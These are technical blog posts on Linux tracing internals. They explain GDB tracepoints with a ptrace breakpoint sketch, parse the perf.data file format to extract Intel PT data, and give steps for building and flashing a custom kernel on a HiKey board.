These are the basic, default tracepoints. The idea of their use is similar to breakpoints: GDB replaces the target instruction with a TRAP or any other exception-causing instruction. On x86, this is usually an int 3, which has a special single-byte opcode (0xCC) reserved for it. Replacing a target instruction with this single byte ensures that the neighboring instructions are not corrupted. So, during the execution of the process, the CPU hits the int 3, the process halts and the program state is saved. The OS sends a SIGTRAP signal to the process. As GDB is attached to or is running the process, it receives a SIGCHLD as a notification that something happened with a child. It does a wait(), which tells it that the process has received a SIGTRAP. Thus the SIGTRAP never reaches the process, as GDB intercepts it. The original instruction is first restored, or executed out-of-line for non-stop multi-threaded debugging. GDB transfers control to the trace collection code, which does the data collection part upon evaluating any condition set. The data is stored in a trace buffer. Then, the original instruction is replaced again with the tracepoint, and normal execution continues.

This is all fine and good, but there is a catch: the TRAP mechanism alters the flow of the application and control is passed to the OS, which leads to some delay and a compromise in speed. Even with that, because of a very restrictive conditional tracing design and the better interaction of interrupt-driven approaches with instruction caches, normal interrupt-based tracing in GDB is a robust technique. A faster solution would indeed be a pure userspace approach, where everything is done at the application level.
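As a tiny illustration of those mechanics outside of GDB, this is roughly what planting and hitting an int 3 through ptrace() looks like on x86-64 Linux. It is only a sketch: the breakpoint address is hypothetical, and a real tool would resolve it from the symbol table and deal with PIE/ASLR, errors and signal bookkeeping:

#include <stdint.h>
#include <stdio.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    pid_t child = fork();
    if (child == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        execl("/bin/ls", "ls", (char *) NULL);
    }

    int status;
    waitpid(child, &status, 0);                  /* child stopped at execve() */

    uintptr_t addr = 0x401000;                   /* hypothetical instruction address */
    long orig = ptrace(PTRACE_PEEKTEXT, child, (void *) addr, NULL);
    long patched = (orig & ~0xFFL) | 0xCC;       /* int 3 in the lowest byte */
    ptrace(PTRACE_POKETEXT, child, (void *) addr, (void *) patched);

    ptrace(PTRACE_CONT, child, NULL, NULL);
    waitpid(child, &status, 0);                  /* SIGTRAP: breakpoint was hit */

    /* collect data here, then restore the original byte and back up rip */
    ptrace(PTRACE_POKETEXT, child, (void *) addr, (void *) orig);
    struct user_regs_struct regs;
    ptrace(PTRACE_GETREGS, child, NULL, &regs);
    regs.rip -= 1;
    ptrace(PTRACE_SETREGS, child, NULL, &regs);

    ptrace(PTRACE_CONT, child, NULL, NULL);
    waitpid(child, &status, 0);
    return 0;
}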

Fast Tracepoints

Owing to the limitations stated above, a fast tracepoint approach was developed. This special type of tracepoint uses a dynamic tracing approach. Instead of using the breakpoint approach, GDB uses a mix of the IPA and the remote target (gdbserver) to replace the target instruction with a 5-byte jump to a special section in memory called a jump-pad. This jump-pad, also known as a trampoline, first pushes all registers to the stack (saving the program state). Then, it calls the collector function for trace data collection, executes the displaced instruction out-of-line, and jumps back to the original instruction stream. I will probably write something more about how trampolines work, and about some techniques used in dynamic instrumentation frameworks like Dyninst, in a subsequent post.

[Image: GDB fast tracepoint flow through the jump-pad]

Fast tracepoints can be used with the ftrace command, almost exactly like the trace command. A special command in the following format is sent to the In-Process Agent by gdbserver as,

FastTrace:<tracepoint_object><jump_pad>

where <tracepoint_object> is the object containing the bytecode for conditional tracing, address, type, action etc., and <jump_pad> is the 8-byte-long head of the jump-pad location in memory. The IPA prepares all that and, if all goes well, responds to such a query with,

OK<target_address><jump_pad><fjump_size><fjump>

where <target_address> is the address where the tracepoint is put in the inferior, <jump_pad> is the updated address of the jump-pad head, and <fjump> and <fjump_size> are the jump instruction sequence and its size, copied to the command buffer and sent back by the IPA. The remote target (gdbserver) then modifies the memory of the target process. Much more fine-grained information about fast tracepoint installation is available in the GDB documentation. This is a very pure userspace approach to tracing. However, there is a catch: the target instruction to be replaced should be at least 5 bytes long for this to work, as the jump itself is 5 bytes long (on Intel x86). This means that fast tracepoints in GDB cannot be put everywhere. How code is modified when patching a 5-byte instruction is a discussion for another time. This is probably the fastest way yet to perform dynamic tracing and is a good candidate for such work.

The GDB traces can be saved with tsave and, with the -ctf switch, may also be exported to CTF. I have not tried this, but hopefully it should at least be possible to open the traces with TraceCompass for further analysis. GDB’s fast tracepoint mechanism is quite fast I must say – but in terms of usability, LTTng is a far better and more advanced option. GDB however allows dynamic insertion of tracepoints, and the tracing features are well integrated into your friendly neighborhood debugger. Happy Tracing!

Deconstructing Perf’s Data File

It is no mystery that Perf is like a giant organism written in C with an infinitely complex design. Of course, there is no such thing. Complexity is just a state of mind they would say and yes, it starts fading away as soon as you get enlightened. So, one fine day, I woke up and decided to understand how the perf.data file works because I wanted to extract the Intel PT binary data from it. I approached Francis and we started off on an amazing adventure (which is still underway). If you are of the impatient kind, here is the code.

A Gentle Intro to Perf

I would not delve deep into Perf right now. However, the basics are simple to grasp. It is like a Swiss army knife which contains tools to understand your system at anything from a very coarse to a quite fine level of granularity. It can go all the way from profiling and static/dynamic tracing to custom analyses built upon hardware performance counters. With custom scripts, you can generate call-stacks, Flame Graphs and what not! Many tracing tools such as LTTng also support adding Perf contexts to their own traces. My personal experience with Perf has usually been just to profile small pieces of code. Sometimes I use its annotate feature to look at the disassembly and see instruction profiling right from my terminal. Occasionally, I use it to get immediate stats on system events such as syscalls etc. Its fantastic support in the Linux kernel, owing to the fact that it is tightly bound to each release, means that you can always have reliable information. Brendan Gregg has written so much about it as part of his awesome Linux performance tools posts. He has some actually useful stuff you can do with Perf. My post here just talks about some of its internals. So, if Perf were a dinosaur, I am just talking about its toe in this post.

Perf contains a kernel part and a userspace part. The userspace part of Perf is located in the kernel directory tools/perf. The perf command that we use is compiled here. It reads kernel data from the Perf buffer based on the events you select for recording. For a list of all events you can use, do perf list or sudo perf list. The data from Perf’s buffer is then written to the perf.data file. For hardware traces such as Intel PT, the extra data is written to auxiliary buffers and saved to the data file. So to get your own custom stuff out of Perf, just read its data file. There are multiple ways, like using scripts, but reading the binary directly allows for a better learning experience. The perf.data is like a magical output file that contains a plethora of information based on which events you selected and how the perf record command was configured. With hardware trace enabled, it can generate a 200MB+ file in 3-4 seconds (yes, seriously!). We need to first know how it is organized and how the binary is written.

Dissection Begins

Rather than going deep and trying to understand scripted ways to decipher this, we went all in and opened the file with a hex editor. The goal here was to learn how the Intel PT data can be extracted from the AUX buffers that Perf used and wrote in the perf.data file. By no means is this the only correct way to do this. There are more elegant solutions I think, esp. if you see some kernel documentation and the uapi perf_event.h file or see these scripts for custom analysis. Even then, this can surely be a good example to tinker around more with Perf. Here is the workflow:

  1. Open the file as hex. I use either Vim with the :%!xxd command or Bless. This will come in handy later.
  2. Use perf report -D to keep track of how Perf is decoding and visualizing events in the data file in hex format.
  3. Open the above command with GDB along with the whole Perf source code. It is in the tools/perf directory in kernel source code.

If you set up your IDE to debug, you would also have imported the Perf source code. Now, we just start moving incrementally – looking at the bytes in the hex editor and correlating them with the magic perf report is doing in the debugger. You’ll see lots of bytes like these :

[Image: hex dump of the beginning of a perf.data file]

A cursory look tells us that the file starts with a magic – PERFILE2. Searching for it in the source code eventually leads to the structure that defines the file header:

struct perf_file_header {
   u64 magic;
   u64 size;
   u64 attr_size;
   struct perf_file_section attrs;
   struct perf_file_section data;
   /* event_types is ignored */
   struct perf_file_section event_types;
   DECLARE_BITMAP(adds_features, HEADER_FEAT_BITS);
};

So we start by mmapping the whole file to buf and just typecasting it to this struct. The header->data element is an interesting thing. It contains an offset and size as part of a perf_file_section struct. We observe that the offset is near the start of some strings – probably some event information? Hmm.. so let’s try to typecast this offset position in the mmapped buffer (buf + pos) to the perf_event_header struct :

struct perf_event_header {
   __u32 type;
   __u16 misc;
   __u16 size;
};
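Before iterating over events, here is a minimal plain-C sketch of that setup: mmap the file, typecast the start to the file header and jump to the data section. It assumes the struct definitions above are pasted in from perf’s headers (perf_file_section is just a u64 offset plus a u64 size) and leaves out all error handling:

#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    int fd = open(argv[1], O_RDONLY);             /* path to a perf.data file */
    struct stat st;
    fstat(fd, &st);

    char *buf = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    struct perf_file_header *fh = (struct perf_file_header *) buf;

    /* fh->data tells us where the event stream starts and how long it is */
    unsigned long pos = fh->data.offset;
    unsigned long end = fh->data.offset + fh->data.size;
    printf("magic %.8s, events at offset %lu, %lu bytes\n",
           (char *) &fh->magic, pos, end - pos);

    munmap(buf, st.st_size);
    close(fd);
    return 0;
}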

For starters, let’s print this h->type and see what the first event is. With our perf.data file, the perf report -D command as a reference tells us that it may be the event type 70 (0x46) with 136 (0x88) bytes of data in it. Well, the hex says it’s the same thing at the (buf + pos) offset. This is interesting! We probably just found our first event. Let’s just iterate over the whole buffer, adding h->size each time, and print the event types as well.

while (pos < file.size()) {
    struct perf_event_header *h = (struct perf_event_header *) (buf + pos);
    qDebug() << "Event Type" << h->type;
    qDebug() << "Event Size" << h->size;
    pos += h->size;
}

Nice! We have so many events. Who knew? Perhaps the data file is not a mystery anymore. What are these event types though? The perf_event.h file has a big enum with event types and some very useful documentation. Some more mucking around leads us to the following enum :

enum perf_user_event_type { /* above any possible kernel type */
    PERF_RECORD_USER_TYPE_START = 64,
    PERF_RECORD_HEADER_ATTR = 64, 
    PERF_RECORD_HEADER_EVENT_TYPE = 65, /* deprecated */
    PERF_RECORD_HEADER_TRACING_DATA = 66,
    PERF_RECORD_HEADER_BUILD_ID = 67,
    PERF_RECORD_FINISHED_ROUND = 68,
    PERF_RECORD_ID_INDEX = 69,
    PERF_RECORD_AUXTRACE_INFO = 70,
    PERF_RECORD_AUXTRACE = 71,
    PERF_RECORD_AUXTRACE_ERROR = 72,
    PERF_RECORD_HEADER_MAX
};

So event 70 was PERF_RECORD_AUXTRACE_INFO. Well, the Intel PT folks indicate in the documentation that they store the hardware trace data in an AUX buffer. And perf report -D also shows event 71 with some decoded PT data. Perhaps that is what we want. A little more fun with GDB on perf tells us that, while iterating, perf itself uses the union perf_event from event.h, which contains an auxtrace_event struct as well.

struct auxtrace_event {
    struct perf_event_header header;
    u64 size;
    u64 offset;
    u64 reference;
    u32 idx;
    u32 tid;
    u32 cpu;
    u32 reserved__; /* For alignment */
};

So, this is how they lay out the events in the file. Interesting. Well, it seems we can just look for event type 71, typecast it to this struct, extract size bytes of trace data and move on. The Intel PT documentation further says that the AUX buffer is per-CPU, so we may need to extract separate files for each CPU based on the cpu field in the struct. We do just that and get our extracted bytes as the raw PT packets which the CPUs generated when the intel_pt event was used with Perf.
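A rough sketch of that extraction loop, reusing buf, pos and end from the earlier sketch (this assumes, as the struct layout and the perf report -D output suggest, that the raw AUX bytes immediately follow each PERF_RECORD_AUXTRACE record and are not counted in its header size):

/* continues the earlier sketch: buf, pos and end are already set up */
while (pos < end) {
    struct perf_event_header *h = (struct perf_event_header *) (buf + pos);
    if (h->size == 0)
        break;                                   /* bail out on anything malformed */

    if (h->type == 71) {                         /* PERF_RECORD_AUXTRACE */
        struct auxtrace_event *aux = (struct auxtrace_event *) h;

        char name[32];
        snprintf(name, sizeof(name), "cpu%u.ptraw", aux->cpu);
        FILE *out = fopen(name, "ab");

        /* the raw Intel PT bytes follow the record itself */
        fwrite((char *) h + h->size, 1, aux->size, out);
        fclose(out);

        pos += h->size + aux->size;              /* skip the record and its payload */
    } else {
        pos += h->size;
    }
}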

A Working Example

The above exercise was surprisingly easy once we had figured things out, so we just did a small prototype for our lab’s research purposes. There are a lot of things we learnt. For example, the actual bytes for the header (containing event stats etc. – usually the thing that Perf prints on top if you do perf report --header) are actually written at the end of Perf’s data file. Or how the endianness of the file is determined from the magic. Just before the header at the end, there are some bytes (near event 68) which I still have not figured out how to handle. Perhaps it is too easy and I just don’t know the big picture yet. We just assume there are no more events if the event size is 0 😉 Works for now. A more convenient way than this charade is to use scripts such as this for doing custom analyses. But I guess that is less fun than going all l33t on the data file.

I’ll try to get some more events out along with the Intel PT data and see what other stuff is hidden inside. Also, Perf is quite tightly bound to the kernel for various reasons. Custom userspace APIs may not always be the safest solution. There is no guarantee that analyzing binaries from newer versions of Perf will always work with the approach of our experimental tool. I’ll keep you folks posted as I discover more about Perf internals.

Custom Kernel on 96boards Hikey LeMaker

I started exploring CoreSight on the newer Cortex-A53 based platforms, and the one which caught my eye was the Hikey LeMaker, based on a Hisilicon Kirin 620 octa-core CPU. It seems really powerful for the size it comes in. However, the trials with CoreSight did not end well for me, as I soon realized that there is some issue in the hardware that is preventing CoreSight access on all CPUs with the upstream kernel drivers. I further looked at the device tree files in their kernel tree, and it seems the descriptions for the CoreSight components are still not there. Hopefully it will be fixed with more kernel patches. I did not experiment with it further. Apart from that, the board seems a really nice thing to play around with. There is Android as well as Debian support that works out of the box.

I am just documenting the steps I used to get a custom kernel for the board so that I don’t forget them 😉 Probably someone else may also find them useful. For a complete guide go here. Let’s start with getting the necessary files and the latest filesystem. I am using the 17th March snapshot from here. It is based on the hikey-mainline-rebase branch of their custom Linux kernel repo. Hopefully in the near future none of this will be required and things get into mainline. We also need the flashing tools and bootloader from here.

Updating with pre-built Images

The board ships with a v3.10 kernel. We need to first update it with the prebuilt binaries and then add our own custom built kernel to a custom location in rootfs. First get fastboot on your host with

$ sudo dnf install fastboot

Then copy the following lines into /etc/udev/rules.d/51-android.rules on the host, so that we can set proper read/write permissions and access the device without root.

SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", ATTR{idProduct}=="d00d", MODE="0660", GROUP="dialout"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", ATTR{idProduct}=="1057", MODE="0660", GROUP="dialout"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", ATTR{idProduct}=="1050", MODE="0660", GROUP="dialout"

Now close Jumper 1 and Jumper 2 in the CONFIG section (J601) on the board. It is near the extended IO. Power on the board. If you have a serial connection to your host, nothing should come up. Now send the boot downloader to the board; a green LED lights up. After that, check if the device is now recognized by fastboot.

$ sudo python hisi-idt.py -d /dev/ttyUSB0 --img1=l-loader.bin
$ sudo fastboot devices

The board should now be listed by fastboot as a device. We now start writing all the binaries to the eMMC – partition table, kernel image, rootfs etc. – to get the system alive again. The 8G table is for the board with 8G storage.

$ sudo fastboot flash ptable ptable-linux-8g.img
$ sudo fastboot flash fastboot fip.bin
$ sudo fastboot flash nvme nvme.img
$ sudo fastboot flash boot boot-fat.uefi.img
$ sudo fastboot flash system hikey-jessie_developer_20160317-33.emmc.img

We are done. Open Jumper 2 and restart. You should now see the snapshot kernel being booted up.

Build Custom Kernel

This is a quick way to build and test kernels based on the source from here. More detailed information on building the software from source is here. You will also need a cross toolchain to build the kernel. Get the Linaro one and set it up.

$ export LOCALVERSION="-suchakra-hikey"
$ make distclean
$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig

You can customize what you want in the kernel now and then build the Image, modules and the device tree blob,

$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- menuconfig 
$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j8 Image modules hisilicon/hi6220-hikey.dtb

Install the modules in a local directory for now

$ make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=./modules-4.4-suchakra modules_install

Transfer Kernel to Board

Next, copy arch/arm64/boot/Image and arch/arm64/boot/dts/hisilicon/hi6220-hikey.dtb from the host to the board, into the /boot/suchakra directory. You can just scp these from the host. Add another menu entry in /boot/efi/…/grub.cfg with the new kernel and dtb file. You can keep the initrd the same. Copy the /lib/modules directory from inside modules-4.4-suchakra on the host to the target.

That is all. Time to reboot! I need to build custom kernels quite often, so I have set up a script to build and scp the image from the host to the target.

What about CoreSight?

As I said before, this may not be the best platform to experiment with CoreSight; however, it may be possible to access trace features using the CoreSight Access Library from ARM DS-5. I also tried the Snapdragon-based Dragonboard 410c, and I was able to build and run the 4.4 kernel with CoreSight support quite quickly on that one as well. Linaro developers hint at CoreSight support for A53 (ARMv8) reaching the mainline kernel in v4.7. The v4.4 one that I have right now is from the landing-team git of Linaro. I can confirm that on the Dragonboard 410c it is possible to get traces using the ETF as sink and the ETM as source, by using the default kernel drivers and following the default kernel documentation on the same. The generated trace binary can be read using ptm2human, which supports ETMv4 now. However, I am still trying to get my head around what the decoded traces actually mean. More CoreSight stuff will follow as I discover its power. Apart from that, it was fun learning how DTBs work 🙂